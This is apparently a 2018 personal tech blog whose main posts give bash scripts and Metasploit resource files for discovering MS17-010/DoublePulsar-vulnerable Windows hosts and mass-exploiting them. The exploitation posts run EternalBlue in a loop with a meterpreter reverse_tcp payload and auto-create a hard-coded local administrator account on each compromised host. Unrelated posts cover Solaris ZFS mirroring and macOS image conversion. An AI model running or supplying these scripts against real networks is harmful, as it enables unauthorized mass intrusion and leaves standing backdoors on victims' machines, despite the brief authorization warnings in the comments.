<find vuln hosts>
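#!/bin/bash
# Discovery report: dump the Metasploit vulns table, reduce it to a sorted
# list of IPv4 addresses, compare that list with the previous day's list
# and mail both the full list and the newly-seen hosts.
#
# Outputs (all under $VULNHOSTS):
#   vulns.msf, vulns.msf.o, vulns.msf.ip   scratch files from the dump
#   vulnerablehosts.<YYYYMMDD>             every address in the vulns table
#   changes.<YYYYMMDD>                     sdiff lines only in today's list
# Requires msfconsole, mail and sdiff on PATH; the paths assume root.
set -euo pipefail

VULNHOSTS=/root/doublepulsar.scan/VULNHOSTS
TIMESTAMP=$(date "+%Y%m%d")
readonly VULNHOSTS TIMESTAMP

mkdir -p -- "$VULNHOSTS"
cd -- "$VULNHOSTS" || exit 1

# `color false` keeps ANSI escapes out of the dump.
msfconsole -x "color false ; vulns -o $VULNHOSTS/vulns.msf ; exit"

sort -u -- "$VULNHOSTS/vulns.msf" > "$VULNHOSTS/vulns.msf.o"
# Pull every dotted quad out of the dump. The pattern accepts any four
# 1-3 digit groups (e.g. 999.1.1.1); grep returns 1 on no match, which
# must not abort the run -- an empty list is a valid result.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' \
  "$VULNHOSTS/vulns.msf.o" > "$VULNHOSTS/vulns.msf.ip" || true
sort -u -- "$VULNHOSTS/vulns.msf.ip" > "$VULNHOSTS/vulnerablehosts.$TIMESTAMP"

# Compare with the previous day's list(s). The original `for file in
# $(find . -mtime 1)` re-created changes.$TIMESTAMP on every iteration
# (only the last file's diff survived), piped through `less` for no
# reason, and also picked up stray files such as changes.*; restrict the
# search to earlier vulnerablehosts.* files and append.
: > "changes.$TIMESTAMP"
while IFS= read -r -d '' prev; do
  [[ "$prev" == "./vulnerablehosts.$TIMESTAMP" ]] && continue
  # sdiff marks lines present only in the right-hand (today's) file
  # with `>`, i.e. hosts that were not in the earlier list.
  sdiff -- "$prev" "vulnerablehosts.$TIMESTAMP" | grep '>' >> "changes.$TIMESTAMP" || true
done < <(find . -maxdepth 1 -name 'vulnerablehosts.*' -mtime 1 -print0)

mail -s "vulnerable hosts $TIMESTAMP" me@hell < "vulnerablehosts.$TIMESTAMP"
mail -s "vulnerable hosts difference $TIMESTAMP" me@hell < "changes.$TIMESTAMP"
#rm -rf "$VULNHOSTS"/vulns.*
#rm "$VULNHOSTS/changes.$TIMESTAMP"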
<post report, exploit>
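#!/bin/bash
# Post-report step: hand today's vulnerable-host list (written by the
# discovery script) to the msf exploit loop and mail the hosts that
# produced a session. doublepulsar-loop.rc reads its targets from
# /root/.msf4/thewicked; session logs are archived under $PROCESS/<date>.
#
# Requires: $THEWICKED/vulnerablehosts.<today> and
#           /root/.msf4/doublepulsar-loop.rc.
# WARNING: every host copied into thewicked gets exploited -- only feed
#          this script hosts you are authorized to attack.
set -euo pipefail

PROCESS=/root/doublepulsar.scan/exploit
THEWICKED=/root/doublepulsar.scan/VULNHOSTS
TODAY=$(date '+%Y%m%d')
WORK=/root/.msf4
readonly PROCESS THEWICKED TODAY WORK

cd -- "$PROCESS" || exit 1

# Stop rather than run the loop against a missing or empty target list
# (the original cp would have failed, or left yesterday's list in place).
if [[ ! -s "$THEWICKED/vulnerablehosts.$TODAY" ]]; then
  printf 'no target list %s\n' "$THEWICKED/vulnerablehosts.$TODAY" >&2
  exit 1
fi

# Keep a dated copy of the previous target list before replacing it.
[[ -f "$WORK/thewicked" ]] && cp -- "$WORK/thewicked" "$WORK/thewicked.$TODAY"
cp -- "$THEWICKED/vulnerablehosts.$TODAY" "$WORK/thewicked"

#hack em
cd -- "$WORK"
# `jobs -K` clears handlers left over from an earlier run before looping.
msfconsole -x "color false ; jobs -K ; resource doublepulsar-loop.rc ; exit"

# Session log names carry the date and target; collect the addresses of
# hosts that produced a session today. Glob instead of parsing `ls`.
outdir="$PROCESS/$TODAY"
mkdir -p -- "$outdir"
: > "$PROCESS/exploited.$TODAY"
for log in "$WORK"/logs/sessions/*"$TODAY"*; do
  [[ -e "$log" ]] || continue
  basename -- "$log" \
    | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' \
    >> "$PROCESS/exploited.$TODAY" || true
done
# Archive every session log, as before. No logs at all (nothing exploited)
# is a normal outcome, so a failed mv is ignored.
mv -- "$WORK"/logs/sessions/*.log "$outdir"/ 2>/dev/null || true

mail -s "doublepulsar vuln hosts exploited $TODAY" me@hell < "$PROCESS/exploited.$TODAY"
exit 0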
Tuesday, October 30, 2018
automate ms17-010 exploitation better
Wednesday, September 26, 2018
automate exploiting newly-found doublepulsar vulnerable hosts
i've written about how to automate discovery. let's go to the next level and automate
reporting on and exploiting newly-discovered doublepulsar vulnerable hosts.
this assumes you already have a previously created list of vulnerable hosts that we diff against.
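#!/bin/bash
# Report on and exploit hosts that are newly present in the msf vulns
# table compared with yesterday's list, then mail the results.
#
# Flow: dump vulns -> extract IPv4s -> compare with vuln.<yesterday> ->
#       fingerprint the new hosts with smb_version -> mail -> copy the
#       new hosts to /root/.msf4/thewicked -> run doublepulsar-loop.rc ->
#       mail the hosts that produced a session.
#
# Requires $PROCESS/vuln.<yesterday> from a previous run, msfconsole,
# mail and pkill.
# NOTE(review): vuln.<date> holds only that day's *new* hosts (the parsed
# full list vulnparsed.* is deleted below), so a host first seen two days
# ago and still vulnerable is reported -- and exploited -- again; keep a
# full baseline if that is not wanted.
# WARNING: every host written to thewicked is exploited by the loop;
#          only feed this script hosts you are authorized to attack.
set -euo pipefail

PROCESS=/root/doublepulsar.scan/exploit
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
IPV4_RE='[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
readonly PROCESS TODAY YESTERDAY IPV4_RE

cd -- "$PROCESS" || exit 1

# Without a baseline every host would be reported (and exploited) as new.
if [[ ! -f "$PROCESS/vuln.$YESTERDAY" ]]; then
  printf 'missing baseline %s\n' "$PROCESS/vuln.$YESTERDAY" >&2
  exit 1
fi

#dump vulns
msfconsole -x "color false ; vulns -o $PROCESS/vulndetect.$TODAY ; exit"
# grep returns 1 when the dump holds no addresses; an empty list is fine.
grep -o "$IPV4_RE" "$PROCESS/vulndetect.$TODAY" > "$PROCESS/vulnparsed.$TODAY" || true

# New hosts = addresses in today's list that are not in yesterday's.
# comm(1) on sorted input replaces the `diff -u | grep + | ... | sed`
# chain, which also flagged hosts that had merely moved in the dump.
comm -13 <(sort -u -- "$PROCESS/vuln.$YESTERDAY") \
         <(sort -u -- "$PROCESS/vulnparsed.$TODAY") > "$PROCESS/vuln.$TODAY"

# Fingerprint the new hosts. The scanner option is THREADS; the original
# `set thread 100` set a non-existent option and ran single-threaded.
msfconsole -x "color false ; spool $PROCESS/output.$TODAY ; use auxiliary/scanner/smb/smb_version ; set RHOSTS file:$PROCESS/vuln.$TODAY ; set THREADS 100 ; run ; exit"

# Mail body: the date (the original echoed $DATE, which is never set),
# then the new hosts, then the scanner output.
printf '%s\n' "$TODAY" > "$PROCESS/mail.$TODAY"
cat -- "$PROCESS/vuln.$TODAY" "$PROCESS/output.$TODAY" >> "$PROCESS/mail.$TODAY"
mail -s "new doublepulsar vuln hosts $TODAY " me@in.hell < "$PROCESS/mail.$TODAY"
rm -f -- "$PROCESS"/vulnparsed.* "$PROCESS"/vulndetect.* "$PROCESS/mail.$TODAY"

cp -- "$PROCESS/vuln.$TODAY" /root/.msf4/thewicked
#hack em
# Stop any msfconsole left from an earlier run. `ps | grep | kill -9`
# also matched the grep itself and any unrelated command line containing
# "msfconsole"; pkill -f is narrower, and TERM first lets msf clean up.
pkill -TERM -f msfconsole || true   # nothing running is fine
sleep 5
pkill -KILL -f msfconsole || true
# -r takes a resource file path, so "<file> ; exit" was not a valid
# argument; use -x with `resource` as the discovery scripts do.
msfconsole -x "resource /root/.msf4/doublepulsar-loop.rc ; exit"

: > "$PROCESS/exploited.$TODAY"
for log in /root/.msf4/logs/sessions/*"$TODAY"*; do
  [[ -e "$log" ]] || continue
  basename -- "$log" | grep -o "$IPV4_RE" >> "$PROCESS/exploited.$TODAY" || true
done
mail -s "new doublepulsar vuln hosts exploited $TODAY " me@in.hell < "$PROCESS/exploited.$TODAY"
rm -f -- "$PROCESS/exploited.$TODAY"
exit 0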
Monday, September 24, 2018
no raid-1? try zfs-mirror in sol11. but wait...
i installed solaris 11.14 on a decade-old system. i was really happy it installed. and then i remembered:
i was not given the option to mirror anything. it just installed and i clicked f2 f2 f2.
i want to set up something like raid-1. this is solaris, so i can do zfs mirroring. good enough. oh, i did an install over an old system, so yeah, there's that.
what i ended up doing was grabbing the partition table from the first (zfs-pool holding) disk and over-wrote that of the second disk since my re-label command was ignored. after that, i created my mirror pool and all was well with the world.
zpool status rpool
pool: rpool
state: ONLINE
scan: none requested
config:
NAME STATE READ WRITE CKSUM
rpool ONLINE 0 0 0
c0t5000CCA022532534d0s0 ONLINE 0 0 0
errors: No known data errors
only disk in rpool: c0t5000CCA022532534d0s0
[root@blackhole ~]# format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
0. c0t5000CCA022532534d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022532534
/dev/chassis/SYS/HDD0/disk
1. c0t5000CCA022543154d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022543154
/dev/chassis/SYS/HDD1/disk
1 is the second disk
1. verify it has Part 0 . It does!
[root@blackhole ~]# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
vdev verification failed: use -f to override the following errors:
/dev/dsk/c0t5000CCA022543154d0s0 contains a ufs filesystem.
Unable to build pool from specified devices: device already in use
Nope.
format -e
<select 1>
format > p [Partition editor]
format > label
Specify Label type[0]: 0
Ready to label disk, continue? y
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
cannot attach c0t5000CCA022543154d0s0 to c0t5000CCA022532534d0s0: device is too small
Still nope.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0
* /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 585912500 585912499
2 5 01 0 585912500 585912499
okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 262500 262499
1 3 01 262500 262500 524999
2 5 01 0 585912500 585912499
6 4 00 525000 585387500 585912499
NOT okay: slice 0 on this disk is only 262500 sectors (the old ufs layout), which is why zpool attach said the device is too small.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0 > /tmp/dsk0-part.dump
root@blackhole:~# fmthard -s /tmp/dsk0-part.dump /dev/rdsk/c0t5000CCA022543154d0s0
fmthard: New volume table of contents now in place.
Verify the VTOC on c0t5000CCA022543154d0s0 before going further: fmthard -s has just overwritten the second disk's label, so whatever was on it (the ufs filesystem zpool complained about above) is gone -- be very sure you pointed it at the right rdsk device. We're going to do something wicked.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 585912500 585912499
2 5 01 0 585912500 585912499
This is okay.
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
Make sure to wait until resilver is done before rebooting.
This is much better.
root@blackhole:~# zpool status rpool
pool: rpool
state: ONLINE
scan: resilvered 21.9G in 2m52s with 0 errors on Mon Sep 24 15:39:51 2018
config:
NAME STATE READ WRITE CKSUM
rpool ONLINE 0 0 0
mirror-0 ONLINE 0 0 0
c0t5000CCA022532534d0s0 ONLINE 0 0 0
c0t5000CCA022543154d0s0 ONLINE 0 0 0
errors: No known data errors
This is much much better.
root@blackhole:~# zpool list rpool
NAME SIZE ALLOC FREE CAP DEDUP HEALTH ALTROOT
rpool 278G 38.2G 240G 13% 1.00x ONLINE -
We are golden!
Saturday, September 22, 2018
macos split all the jpgs in a directory in half
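# Crop every .jpg under the current directory to its left half, in place.
# The original used `read $i`: with $i unset that is a bare `read`, which
# stores into $REPLY and leaves $i empty, so convert was called with no
# file. Read into `i` with -r, and walk the names NUL-delimited so spaces
# or newlines in file names do not break the loop.
# NOTE(review): -crop 50%x100% with no offset yields two tiles; writing
# them back under the input name presumably produces numbered files
# rather than overwriting -- check the result before running on a tree.
find . -name "*.jpg" -print0 | while IFS= read -r -d '' i; do convert "$i" -crop 50%x100% +repage "$i"; done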
a play on:
# Single-file form: -crop 50%x100% with no offset tiles the image into two
# halves; +repage resets the virtual canvas so each half is a standalone image.
convert input.png -crop 50%x100% +repage input.png
Monday, September 17, 2018
macos terminal convert pdf to jpg
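# Convert every .pdf under the current directory to a .jpg next to it
# with macOS sips(1). The original built the output name with
# `echo "$filename" \ | sed "s/pdf/jpg/g"`: the stray backslash passed an
# extra argument to echo (a trailing space in the name) and the global
# substitution also rewrote "pdf" inside directory names. Only the
# trailing extension is replaced here.
#
# jpg_name_for PATH -> PATH with a trailing ".pdf" replaced by ".jpg"
jpg_name_for() {
  local pdf=$1
  printf '%s\n' "${pdf%.pdf}.jpg"
}
find . -name "*.pdf" -print0 | while IFS= read -r -d '' filename; do fileconvert=$(jpg_name_for "$filename"); sips -s format jpeg "$filename" --out "$fileconvert"; done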
Thursday, August 16, 2018
remotely exploit a number of hosts with metasploit via eternalblue
in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
## msfconsole
msf > vulns -R
… a lot of text … look at end of output for a file dropped in /tmp e.g. ...
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k
msf > exit
# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
Once everything has completed, look through ~/.msf4/logs/doublepulsar.log for adminuser: those hosts have had the local admin user for your evil created. Be aware that doublepulsar-lsadmin hard-codes the same account name and password on every exploited host, so each of them now carries a standing backdoor -- change the credentials, remove the account when you are done, and only run this against hosts you are authorized to exploit.
## files
[doublepulsar-loop.rc]
<ruby>
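# the rhosts from vuln_db: one host per line. Every host listed here is
# exploited -- make sure the file holds only hosts you are authorized to
# attack.
hostsfile = "/root/.msf4/thewicked"
hosts = []
File.foreach(hostsfile) do |line|
  host = line.strip
  # Skip blank lines and '#' comments; the original pushed them as-is,
  # which became `set rhost` with an empty value and a wasted exploit run.
  next if host.empty? || host.start_with?("#")
  hosts << host
end
# msfconsole commands with chained post exploit: module, payload and
# AUTORUNSCRIPT are loaded once, only RHOST changes per iteration.
self.run_single("resource /root/.msf4/doublepulsar.rc")
# the rhosts loop
hosts.each do |rhost|
  self.run_single("set rhost #{rhost}")
  self.run_single("exploit")
  run_single("sleep 2s")
end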
</ruby>
[doublepulsar.rc]
# msfconsole resource loaded once by doublepulsar-loop.rc. Everything is
# spooled to doublepulsar.log at the most verbose level, which is what
# the post-run grep for "adminuser" relies on.
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
use exploit/windows/smb/ms17_010_eternalblue
# Both checks are off so a mismatch does not stop the loop.
# NOTE(review): with them off a host whose OS/arch does not match the
# x64 payload is still exploited, which is a crash risk for that host --
# confirm the target list is x64-only or leave the checks on.
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# LHOST is left blank here: fill in this box's address as reachable from
# the targets, or the reverse handler has nowhere to call back to.
set LHOST
# Runs doublepulsar-lsadmin in every new meterpreter session.
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
[doublepulsar-lsadmin]
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
Monday, August 13, 2018
one-off doublepulsar scan script because sometimes people need to do one thing and one thing only
so yeah.
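#!/bin/bash
# One-off MS17-010 / DoublePulsar check of a single IPv4 address.
# Prompts for the address and (optionally) an email address, runs the msf
# smb_ms17_010 scanner against it, prints the verdict and mails the
# findings.
#
# Changes from the original:
#  - an invalid address exits non-zero instead of 0
#  - work files live in a private mktemp directory instead of /tmp/<ip>,
#    which was predictable and rm -rf'd on entry (another local user could
#    pre-create or symlink it)
#  - an empty email address skips the user mail instead of calling
#    mail(1) with no recipient
set -euo pipefail

EXECUTE=$(date "+%Y%m%d")
readonly EXECUTE

read -r -p "Enter IP to evaluate: " IP
# Four 1-3 digit groups; octet range is not checked (999.1.1.1 passes).
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
  read -r -p "Enter email address (or not): " EMAIL
else
  printf 'Not a valid IP\n' >&2
  exit 1
fi

WORKDIR=$(mktemp -d) || exit 1
cleanup() { rm -rf -- "${WORKDIR:?}"; }
trap cleanup EXIT
cd -- "$WORKDIR"

#msfconsole
sudo msfconsole -x "color false ; banner false ; spool $WORKDIR/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"

# Reshape the spool: one finding per line, drop chatter, strip :445,
# keep only lines carrying a "-" status marker, dedupe.
sed 's/]\ /\\\n/g' "$WORKDIR/output.msf" \
  | sed -r '/Error|NOT|properly|Script|\[|\]/d' \
  | sed 's/:445//g' \
  | sed '/-/!d' \
  | sort -u > "$WORKDIR/output.msf.1"
sed '/VULNERABLE/!d' "$WORKDIR/output.msf.1" > "$WORKDIR/output.msf.VULN"
sed '/INFECTED/!d' "$WORKDIR/output.msf.1" > "$WORKDIR/output.msf.INFECTED"
clear 2>/dev/null || true   # no terminal (cron) is not an error

if [[ -s "$WORKDIR/output.msf.INFECTED" ]]; then
  echo " Uh oh $IP DoublePulsar infected"
  if [[ -n "$EMAIL" ]]; then
    mail -s " $IP DoublePulsar infected " "$EMAIL" < "$WORKDIR/output.msf.INFECTED"
  fi
  mail -s " $IP DoublePulsar infected $EXECUTE " youreffingsysadmin@hell.com < "$WORKDIR/output.msf.1"
else
  echo " Phew $IP not infected "
fi

if [[ -s "$WORKDIR/output.msf.VULN" ]]; then
  echo " Sigh $IP DoublePulsar vulnerable "
  if [[ -n "$EMAIL" ]]; then
    mail -s " $IP DoublePulsar vulnerable " "$EMAIL" < "$WORKDIR/output.msf.1"
  fi
else
  echo " Double Phew $IP not DoublePulsar vulnerable"
fi
exit 0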